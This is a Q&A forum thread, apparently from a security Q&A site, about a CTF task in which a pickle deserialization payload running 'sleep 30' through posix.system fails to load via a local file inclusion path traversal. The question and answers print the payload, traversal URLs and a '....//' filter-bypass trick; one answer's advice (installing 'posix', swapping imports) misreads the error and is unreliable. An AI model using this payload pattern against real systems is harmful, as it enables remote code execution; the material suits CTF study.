# Pickle Shellcode Import Error

Tags: python, shellcode, ctf, error-handling

I'm trying to execute pickle shell-code through a download function on a website but I get the following error:

```
<html>
<h1>ERROR: Cannot load file</h1>

<!--
 Traceback (most recent call last):
  File "/opt/example/handlers/UserHandlers.py", line 134, in get
    upload = pickle.load(f)
  File "/usr/local/lib/python2.7/pickle.py", line 1384, in load
    return Unpickler(file).load()
  File "/usr/local/lib/python2.7/pickle.py", line 864, in load
    dispatch[key](self)
  File "/usr/local/lib/python2.7/pickle.py", line 1096, in load_global
    klass = self.find_class(module, name)
  File "/usr/local/lib/python2.7/pickle.py", line 1130, in find_class
    __import__(module)
ImportError: No module named posix

-->
</html>
```

Pickle Shellcode:

```
cposix
system
p1
(S'sleep 30'
p2
tRp3
```

I assume this is a path issue and I also can't import modules by filename. Keep in mind I'm using an LFI vulnerability to call my pickle shell-code.

Example: `http://example.com/download?file=../../../pickle.txt`

Could this be the cause of the issue? 
I should also note this is a CTF, so it should be vulnerable in one way or another. Thanks in advance!

Comment: This looks like more a python programing question, did you google "ImportError: No module named posix" or ask about this in https://stackoverflow.com/?

Answer (score 1):

```
ImportError: No module named posix
```

Is the problem here. You can either attempt to drop to a bash shell and use

```
pip install posix
```

Or the best solution is to just remove

```
import posix
```

and replace it with

```
import os
```

Answer (score 0):

Your shell code needs to look like so according to https://cvedetails.com/cve/CVE-2013-5093/

cposix\nsystem\np1\n(S'sleep 30'\np2\ntRp3.

Also try padding your directory traversal attack with additional characters to account for input sanitation.

http://example.com/download?file=....//....//....//pickle.txt